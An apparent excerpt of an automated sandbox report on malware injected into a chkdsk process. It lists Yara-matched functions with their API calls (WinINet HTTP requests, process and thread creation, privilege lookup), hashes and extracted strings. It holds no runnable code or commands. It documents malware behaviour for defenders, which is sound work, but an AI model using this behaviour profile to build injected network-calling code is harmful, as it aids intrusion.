                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 4a653b523ccba6c3ac2e9043879c2ad37ebd0fb86a0661941df35aff58d40ed9
                                                                                                                    • Instruction ID: eaf5e760c3f5509be5404b443fe6d93cf32af93b4794eb5bdbf8e885931fc8b7
                                                                                                                    • Opcode Fuzzy Hash: 4a653b523ccba6c3ac2e9043879c2ad37ebd0fb86a0661941df35aff58d40ed9
                                                                                                                    • Instruction Fuzzy Hash: 76900226621000021549A558074550B045597D63517D1D419F640A590CCA318C696731
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05018D60 Relevance: .3, Instructions: 288COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5010000_chkdsk.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2340568224-0
                                                                                                                    • Opcode ID: a964900f092e0ebeac9e7859103e84d282d6a82eeaa1e5153a1ace5c603b6e82
                                                                                                                    • Instruction ID: 7613cf34b743b6e90121a6477d48535c314379884c58bdaf17f56bb303935a36
                                                                                                                    • Opcode Fuzzy Hash: a964900f092e0ebeac9e7859103e84d282d6a82eeaa1e5153a1ace5c603b6e82
                                                                                                                    • Instruction Fuzzy Hash: 62A1B4B1E00218ABDB14DFA4EC45FEEB7B9BF54304F44855DE905A7140EB70A7448BAA
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0502CF40 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 42networkCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 435 502cf40-502cf89 call 502d510 438 502cfa6-502cfac 435->438 439 502cf8b-502cfa5 HttpSendRequestA 435->439
                                                                                                                    APIs
                                                                                                                    • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,?,?,?,?,?,?), ref: 0502CF9F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5010000_chkdsk.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: HttpRequestSend
                                                                                                                    • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                                                                                                    • API String ID: 360639707-2503632690
                                                                                                                    • Opcode ID: 50bf3a539a582b7570c02d8e5d19ed092469a1dcec58b1bc9ce4c4ecbe5f9bfe
                                                                                                                    • Instruction ID: 8cd671269641c82f2f006ba5f174658826682c74a3cf74238177a4876aa4ec1a
                                                                                                                    • Opcode Fuzzy Hash: 50bf3a539a582b7570c02d8e5d19ed092469a1dcec58b1bc9ce4c4ecbe5f9bfe
                                                                                                                    • Instruction Fuzzy Hash: EC014BB2909119AFCB00DF98D8459EFBBB8EF58210F158199FD19A7304D670AE10CBE1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0502CE40 Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48networkCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 493 502ce40-502ce89 call 502d510 496 502ceb2-502ceb8 493->496 497 502ce8b-502ceb1 InternetConnectA 493->497
                                                                                                                    APIs
                                                                                                                    • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,?,?,?,?,?,?,?,?,?), ref: 0502CEAB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5010000_chkdsk.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ConnectInternet
                                                                                                                    • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                                                                                                    • API String ID: 3050416762-1024195942
                                                                                                                    • Opcode ID: 7fd4b5f125cd82a5a84db0c2aae9d221d5e42dec682161c45de242df63b80d57
                                                                                                                    • Instruction ID: acb5f88e8d0fab7c1c85d3d6442fde78260930b74e5539f59e2e805cb72876c6
                                                                                                                    • Opcode Fuzzy Hash: 7fd4b5f125cd82a5a84db0c2aae9d221d5e42dec682161c45de242df63b80d57
                                                                                                                    • Instruction Fuzzy Hash: 6201E9B2905118AFCB14DF98D941EEF77B8FF48310F154299BE09A7240D670AE11CBE1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0502CDD0 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41networkCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 562 502cdd0-502ce14 call 502d510 565 502ce31-502ce37 562->565 566 502ce16-502ce30 InternetOpenA 562->566
                                                                                                                    APIs
                                                                                                                    • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?,?,?,?,?), ref: 0502CE2A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5010000_chkdsk.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: InternetOpen
                                                                                                                    • String ID: A$Inte$InternetOpenA$Open$estA$rnetOpenA
                                                                                                                    • API String ID: 2038078732-2195387935
                                                                                                                    • Opcode ID: 880eca95deb22476d015a9a77bdcee2327017793566186656845bc62f03f5f06
                                                                                                                    • Instruction ID: c312d544349c384458919c3e9f00cb1c9fa1cae646a4fcd3ce4abb6f00a841e1
                                                                                                                    • Opcode Fuzzy Hash: 880eca95deb22476d015a9a77bdcee2327017793566186656845bc62f03f5f06
                                                                                                                    • Instruction Fuzzy Hash: 5D011DB2901128AF8B10DF98DC419FF77B8FF48310B04859DBD1997201D671AE518BE1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0501E7A0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 255COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 0501E78A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5010000_chkdsk.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile
                                                                                                                    • String ID: Hey$798}$V\:m
                                                                                                                    • API String ID: 3188754299-3269716171
                                                                                                                    • Opcode ID: b9ce364aa81302bbb4a33d5668db13aebf2256b654b40ce13f5117550d7023a5
                                                                                                                    • Instruction ID: ed2723540f7aed677efb8b44001513cf78e2b5df2938ab0ab0da2b8ab7349a4c
                                                                                                                    • Opcode Fuzzy Hash: b9ce364aa81302bbb4a33d5668db13aebf2256b654b40ce13f5117550d7023a5
                                                                                                                    • Instruction Fuzzy Hash: 5471ED365093819FDB119F38E9856DDBFA9FF4226476406ADCCE58B283D722C406C786
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0502B4E0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 92sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5010000_chkdsk.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep
                                                                                                                    • String ID: net.dll$wininet.dll
                                                                                                                    • API String ID: 3472027048-1269752229
                                                                                                                    • Opcode ID: 93193d3cc52e5b2e496a0983b05b09331f46ca393d273d8b9f5c3f8f732d782b
                                                                                                                    • Instruction ID: c20e7994c7779a87eb619594d7b7055c1b096b4c766d6bd3e6bf0cd4e7810d4d
                                                                                                                    • Opcode Fuzzy Hash: 93193d3cc52e5b2e496a0983b05b09331f46ca393d273d8b9f5c3f8f732d782b
                                                                                                                    • Instruction Fuzzy Hash: 303182B5600614ABD724DFA5E884FEBB7F8FF48700F14851DEA5E5B244D6B0B544CBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0502B4D4 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 88sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5010000_chkdsk.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep
                                                                                                                    • String ID: net.dll$wininet.dll
                                                                                                                    • API String ID: 3472027048-1269752229
                                                                                                                    • Opcode ID: f2cd263fd0e0c85cf9ab00d09ec8081633f0a360dca4f7a3c47697eb0b3c5bd4
                                                                                                                    • Instruction ID: ea21c5f47aef4f1b3f370b16d420a97740efa31c34f3f478d8211900a4b1c1b4
                                                                                                                    • Opcode Fuzzy Hash: f2cd263fd0e0c85cf9ab00d09ec8081633f0a360dca4f7a3c47697eb0b3c5bd4
                                                                                                                    • Instruction Fuzzy Hash: F731D1B5A40204BBD714DFA5E885FEEF7E8FF98300F14852DEA5D5B244D6B065448BE0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0501FC70 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 213COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 0501FD93
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5010000_chkdsk.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 3188754299-2766056989
                                                                                                                    • Opcode ID: a58b8506a32b6300e8bb7d7bb4f1f88c2beba29a4d10f52edf2eacd2f82b8a35
                                                                                                                    • Instruction ID: ea31eb05b35c43d0fc29e3331495a7aacf77cb70796c45343a14b462567dc58e
                                                                                                                    • Opcode Fuzzy Hash: a58b8506a32b6300e8bb7d7bb4f1f88c2beba29a4d10f52edf2eacd2f82b8a35
                                                                                                                    • Instruction Fuzzy Hash: 457194B1A402186BDB24DB64DC88FFFB3BCBF54300F04499DE91997141EB70A7858BA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05025210 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CoInitialize.OLE32(00000000,00000000,?,00000000), ref: 05025227
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5010000_chkdsk.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Initialize
                                                                                                                    • String ID: @J7<
                                                                                                                    • API String ID: 2538663250-2016760708
                                                                                                                    • Opcode ID: 19539773c4db2f2dd690df9880b63c0c939b9749f403e9b16a38f14cf8c2db8c
                                                                                                                    • Instruction ID: f7005bf953661f8e47a9e84c138129298906d3a317e3070a0569f611c6f6f180
                                                                                                                    • Opcode Fuzzy Hash: 19539773c4db2f2dd690df9880b63c0c939b9749f403e9b16a38f14cf8c2db8c
                                                                                                                    • Instruction Fuzzy Hash: 3F315EB5A0021AAFDB10DFD8DC809EFB3B9BF88304B108559E505EB254D771EE058BA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0501B130 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0501B1A2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5010000_chkdsk.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Load
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2234796835-0
                                                                                                                    • Opcode ID: e4976d80fe4ea50e6cb1f558570a17a4cb32234ba2f26d49a844e974abcfe4d9
                                                                                                                    • Instruction ID: bdc3dc88222758a6d03ab44aac7732e60a5750e1ead98040c82b8bf39600abf3
                                                                                                                    • Opcode Fuzzy Hash: e4976d80fe4ea50e6cb1f558570a17a4cb32234ba2f26d49a844e974abcfe4d9
                                                                                                                    • Instruction Fuzzy Hash: F1015EB6E0020EBBDF10EAE0EC46FDDB3B8AB54608F144194ED0897241F631EB04CB92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0502CB10 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateProcessInternalW.KERNEL32(05018690,050186B8,05018450,00000010,050186B8,00000044,?,?,?,00000044,050186B8,00000010,05018450,050186B8,05018690,050186FC), ref: 0502CB64
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5010000_chkdsk.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateInternalProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2186235152-0
                                                                                                                    • Opcode ID: 61231df2275435d959ee28cccfb1f5430d4ab83d7103db4a43b9fa0f686e1a42
                                                                                                                    • Instruction ID: a35f2433d9d16020fc4d6d107abfba73a404a16ceff32fc265d1df3a97519f2f
                                                                                                                    • Opcode Fuzzy Hash: 61231df2275435d959ee28cccfb1f5430d4ab83d7103db4a43b9fa0f686e1a42
                                                                                                                    • Instruction Fuzzy Hash: A701AFB2210108BFCB18DF89DC80EEB77ADAF8C754F158258BA0D97240D630F851CBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0502B620 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,-00000002,5F3BA751,00000000,00000000,0501DD52,?,?,?,5F3BA751,?), ref: 0502B662
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5010000_chkdsk.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2422867632-0
                                                                                                                    • Opcode ID: 40944a803f83533d797b095ce7080f807b8c22ffca2071a969c3061b9817575e
                                                                                                                    • Instruction ID: ed400dbb5f2971c2049fcce60095d14518e37e1d4be10b8b530d83850c9f51a6
                                                                                                                    • Opcode Fuzzy Hash: 40944a803f83533d797b095ce7080f807b8c22ffca2071a969c3061b9817575e
                                                                                                                    • Instruction Fuzzy Hash: 1BF0657378021436E33061A9AC06FDF779CDB94A61F140025F70DDA1C0D595F40182F9
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0501E751 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 0501E78A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5010000_chkdsk.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3188754299-0
                                                                                                                    • Opcode ID: e84ddc07b3927c04a847e33193531daf179f5535cb326bfb6395075305ff6ebb
                                                                                                                    • Instruction ID: cfa364ee7fd614df0beb8dcbee3a113036e81e0bc7ed5a3341058341ec9ab7e6
                                                                                                                    • Opcode Fuzzy Hash: e84ddc07b3927c04a847e33193531daf179f5535cb326bfb6395075305ff6ebb
                                                                                                                    • Instruction Fuzzy Hash: F3E0D1B554020017FF286AA8ED45FDD3B599F58634F884510FD598B1C3D565F5038154
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0502B61D Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,-00000002,5F3BA751,00000000,00000000,0501DD52,?,?,?,5F3BA751,?), ref: 0502B662
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5010000_chkdsk.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2422867632-0
                                                                                                                    • Opcode ID: 5d5dd4ae7bc806d042da22d3ee9552e9f4b64362272cb1c7afe282e6f17b09b5
                                                                                                                    • Instruction ID: af78b02100d3818d99bb5ebd9cd2b1d7f07ddc37a111985dcc29adcfb878aba1
                                                                                                                    • Opcode Fuzzy Hash: 5d5dd4ae7bc806d042da22d3ee9552e9f4b64362272cb1c7afe282e6f17b09b5
                                                                                                                    • Instruction Fuzzy Hash: F7E0127278021037F33062A9AC46FEF679D9B94F51F140115F709EA1C0D595B90182B9
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0502CC00 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0501E0B2,0501E0B2,?,00000000,?,?), ref: 0502CC30
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5010000_chkdsk.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3899507212-0
                                                                                                                    • Opcode ID: 016eb2ded245f3d2803fdc59574230359a6491afd5d0133290dd8ccfc6ad20d1
                                                                                                                    • Instruction ID: 4ee365cf732e5bb4bd48e57fc610a138120eeb47568192f494a355973fb43029
                                                                                                                    • Opcode Fuzzy Hash: 016eb2ded245f3d2803fdc59574230359a6491afd5d0133290dd8ccfc6ad20d1
                                                                                                                    • Instruction Fuzzy Hash: 29E01AB16002146BCB14DF49DC44EE737ADEF88654F118054FE0C5B241C634F8158BF1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0501E760 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 0501E78A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5010000_chkdsk.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3188754299-0
                                                                                                                    • Opcode ID: e3968885ff0ff1805601dffb97bfbc189119b59460fcd5faa8939d8a0675e15d
                                                                                                                    • Instruction ID: b7ae27a3ae8bb042f16eb867295e7a8d05a8205dc93592a03124088af6eb00d5
                                                                                                                    • Opcode Fuzzy Hash: e3968885ff0ff1805601dffb97bfbc189119b59460fcd5faa8939d8a0675e15d
                                                                                                                    • Instruction Fuzzy Hash: 8FE0C27560030427FF286AA8ED86FAE3B9C9F4C638F584A50FD199B2C3E574F5418259
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0502CA60 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RtlAllocateHeap.NTDLL(05026E66,?,050275FD,050275FD,?,05026E66,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0502CA8D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5010000_chkdsk.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1279760036-0
                                                                                                                    • Opcode ID: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                                                                    • Instruction ID: f38dc690b609f9da2eb1066098275e456d6d89336173aec80160b07bf3ab33c5
                                                                                                                    • Opcode Fuzzy Hash: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                                                                    • Instruction Fuzzy Hash: C1E012B2200218ABCB18EF89DC44EAB37ACAF88664F118054FE085B241C630F9118AB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0502CAA0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,082AA4AB,00000000,?), ref: 0502CACD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5010000_chkdsk.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3298025750-0
                                                                                                                    • Opcode ID: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                                                    • Instruction ID: 5495f7a0f18413aa5d94ac5c84d5ca7a875020026230fcc0ab72648b95b51c6c
                                                                                                                    • Opcode Fuzzy Hash: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                                                    • Instruction Fuzzy Hash: 65E01AB12002146BCB14DF49DC48EA737ACAF88750F114054FE095B241C630F911CAB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0501E560 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00008003,?,?,05018D7A,?), ref: 0501E591
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5010000_chkdsk.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2340568224-0
                                                                                                                    • Opcode ID: c9da64f0d3fe6b3b6725e7b130441aea03fc6c268bc74dfe64e18102568ee21a
                                                                                                                    • Instruction ID: 34cf986cd44e9d3db97c5c939c9a07b30a7da5d52847ec481bffe333bb35bd11
                                                                                                                    • Opcode Fuzzy Hash: c9da64f0d3fe6b3b6725e7b130441aea03fc6c268bc74dfe64e18102568ee21a
                                                                                                                    • Instruction Fuzzy Hash: 6ED05E71B803047BFB10E6E5EC06F9E368C9B18650F444064FE0CD66C2E890F10081AA
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05892B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: eaf8a2eb09e4e38c83736bee9dd9a4061668d9a9bb18835a1cef0c46c608bdf0
                                                                                                                    • Instruction ID: fe6ba20db522a874c899a2bdff95fc75ff77cf6fbc420eb88597222e3a11f515
                                                                                                                    • Opcode Fuzzy Hash: eaf8a2eb09e4e38c83736bee9dd9a4061668d9a9bb18835a1cef0c46c608bdf0
                                                                                                                    • Instruction Fuzzy Hash: A0B02B32C020C0C5FE04D7200B08B17390077C0300F15C011D3034240E4738C490F231
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Non-executed Functions

                                                                                                                    Function 05888540 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 058C52D9
                                                                                                                    • Address of the debug info found in the active list., xrefs: 058C52B9, 058C5305
                                                                                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 058C5215, 058C52A1, 058C5324
                                                                                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 058C534E
                                                                                                                    • Critical section debug info address, xrefs: 058C522A, 058C5339
                                                                                                                    • Thread identifier, xrefs: 058C5345
                                                                                                                    • corrupted critical section, xrefs: 058C52CD
                                                                                                                    • undeleted critical section in freed memory, xrefs: 058C5236
                                                                                                                    • double initialized or corrupted critical section, xrefs: 058C5313
                                                                                                                    • Invalid debug info address of this critical section, xrefs: 058C52C1
                                                                                                                    • Critical section address, xrefs: 058C5230, 058C52C7, 058C533F
                                                                                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 058C52ED
                                                                                                                    • 8, xrefs: 058C50EE
